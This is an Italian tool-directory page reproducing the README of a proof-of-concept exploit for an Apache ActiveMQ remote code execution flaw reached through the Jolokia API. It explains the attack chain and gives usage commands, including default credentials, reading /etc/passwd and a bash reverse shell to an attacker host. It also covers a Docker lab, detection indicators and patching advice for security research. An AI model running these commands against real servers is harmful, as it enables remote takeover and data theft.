Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-34197 — Proof-of-concept exploit per CVE-2026-34197, una RCE in Apache ActiveMQ tramite l'API Jolokia. Include un exploit in Python, un template di payload e un laboratorio Docker per test e ricerca. | Kitploit
Strumenti/GitHubGitHub/devsecurityspro/cve-2026-34197
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed TeamingLab e Pratica
GitHubdevsecurityspro/cve-2026-34197

CVE-2026-34197

Proof-of-concept exploit per CVE-2026-34197, una RCE in Apache ActiveMQ tramite l'API Jolokia. Include un exploit in Python, un template di payload e un laboratorio Docker per test e ricerca.

Vedi Repository
44 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-34197 — Apache ActiveMQ RCE tramite API Jolokia

Descrizione

CVE-2026-34197 è una vulnerabilità di esecuzione remota di codice (RCE) in Apache ActiveMQ Classic che consente a un attaccante di eseguire comandi arbitrari sul sistema operativo del server tramite l'API Jolokia esposta nella console web.

La vulnerabilità esiste da oltre 13 anni e risiede nell'interazione tra più componenti: Jolokia (ponte HTTP-JMX), gli MBean di ActiveMQ, i connettori di rete e il trasporto VM.

Informazioni sulla Vulnerabilità

CampoDettaglio
CVE IDCVE-2026-34197
TipoRCE (Remote Code Execution)
CWECWE-20 (Validazione di input errata), CWE-94 (Iniezione di codice)
Versioni affetteActiveMQ Classic < 5.19.4, 6.0.0 — 6.2.2
Versioni corrette5.19.4, 6.2.3
Autenticazione richiestaSì (credenziali predefinite admin:admin comuni)
Senza autenticazione in6.0.0 — 6.1.1 (per CVE-2024-32114)
Porta predefinita8161 (console web)

Meccanismo di Sfruttamento

La catena di attacco funziona così:

  1. L'attaccante invia una richiesta POST a /api/jolokia/ invocando l'operazione addNetworkConnector dell'MBean del broker.
  2. L'argomento contiene un URI con trasporto vm:// che fa riferimento a un broker inesistente.
  3. ActiveMQ tenta di creare quel broker al volo e accetta il parametro brokerConfig che punta a un URL remoto.
  4. Lo schema xbean: indica che la risorsa è un file di configurazione Spring XML.
  5. Spring istanzia tutti i bean definiti nell'XML, incluso uno che esegue Runtime.getRuntime().exec().
  6. Il comando arbitrario viene eseguito sul server.
root@kitploit:~
Attaccante                          ActiveMQ (vittima)
   |                                    |
   |-- POST /api/jolokia/ ------------>|
   |   addNetworkConnector(            |
   |     vm://rce?brokerConfig=        |
   |     xbean:http://ATTACCANTE/x.xml)|
   |                                    |
   |                                    |-- Crea broker VM
   |                                    |-- Scarica x.xml
   |<-- GET /x.xml --------------------|
   |-- Risponde con payload XML ------>|
   |                                    |-- Spring istanzia bean
   |                                    |-- Runtime.exec(COMANDO)
   |                                    |

Struttura del Progetto

root@kitploit:~
CVE-2026-34197/
├── README.md              # Questo file
├── exploit.py             # PoC principale
├── payloads/
│   └── template.xml       # Template del payload Spring XML
├── docker/
│   └── docker-compose.yml # Ambiente di laboratorio vulnerabile
└── LICENSE

Requisiti

  • Python 3.8+
  • Moduli: requests, http.server, argparse (stdlib)
  • Accesso di rete alla porta 8161 del target
  • Docker e Docker Compose (opzionale, per il laboratorio)
root@kitploit:~
pip install requests

Utilizzo

1. Avviare l'ambiente vulnerabile (opzionale)

root@kitploit:~
cd docker
docker-compose up -d

Questo avvia un ActiveMQ Classic 5.18.6 vulnerabile su localhost:8161.

2. Eseguire l'exploit

root@kitploit:~
# Utilizzo base con credenziali predefinite
python exploit.py -t http://TARGET:8161 -l IP_ATTACCANTE -c "id"

# Specificare le credenziali
python exploit.py -t http://TARGET:8161 -l IP_ATTACCANTE -c "whoami" -u admin -p admin

# Specificare la porta del server HTTP del payload
python exploit.py -t http://TARGET:8161 -l IP_ATTACCANTE -lp 9999 -c "cat /etc/passwd"

# Modalità senza autenticazione (ActiveMQ 6.0.0 - 6.1.1)
python exploit.py -t http://TARGET:8161 -l IP_ATTACCANTE -c "id" --no-auth

# Shell inversa
python exploit.py -t http://TARGET:8161 -l IP_ATTACCANTE -c "bash -i >& /dev/tcp/IP_ATTACCANTE/4444 0>&1"

Parametri

ParametroDescrizione
-t, --targetURL di base del target (es: http://10.0.0.1:8161)
-l, --lhostIP dell'attaccante per servire il payload XML
-lp, --lportPorta del server HTTP locale (predefinita: 8888)
-c, --commandComando da eseguire sul target
-u, --userUtente (predefinito: admin)
-p, --passwordPassword (predefinita: admin)
--no-authNon inviare credenziali (per versioni 6.0.0 - 6.1.1)
--broker-nameNome del broker (predefinito: localhost)

Rilevamento

Indicatori nei log del broker ActiveMQ:

root@kitploit:~
INFO  | Establishing network connection from vm://localhost to vm://rce?create=true&brokerConfig=xbean:http://X.X.X.X:8888/payload.xml
WARN  | Could not connect to remote URI: vm://rce?create=true&brokerConfig=xbean:http://X.X.X.X:8888/payload.xml

Altri indicatori:

  • Richieste POST a /api/jolokia/ con addNetworkConnector nel corpo
  • Connessioni HTTP in uscita dal processo ActiveMQ verso host inattesi
  • Processi figli inattesi generati dal processo Java di ActiveMQ

Rimedio

  • Aggiornare ad ActiveMQ Classic 5.19.4 o 6.2.3
  • Cambiare le credenziali predefinite della console web
  • Limitare l'accesso di rete alla porta 8161
  • Monitorare i log del broker per URI vm:// con brokerConfig=xbean:http

Riferimenti

  • NVD — CVE-2026-34197
  • Horizon3 — Analisi tecnica
  • Apache ActiveMQ — Avviso di sicurezza
  • CVE-2024-32114 — Jolokia senza autenticazione
  • CVE-2023-46604 — RCE OpenWire (CISA KEV)

Autore

Creato da KONDOR DEV SECURITY

Telegram

Avviso Legale

Questo PoC è fornito esclusivamente a scopo educativo e di ricerca sulla sicurezza. L'uso di questo strumento contro sistemi senza autorizzazione esplicita è illegale. L'autore non è responsabile dell'uso improprio di questo strumento.

Licenza

MIT — Copyright (c) 2026 KONDOR DEV SECURITY

Scarica lo strumento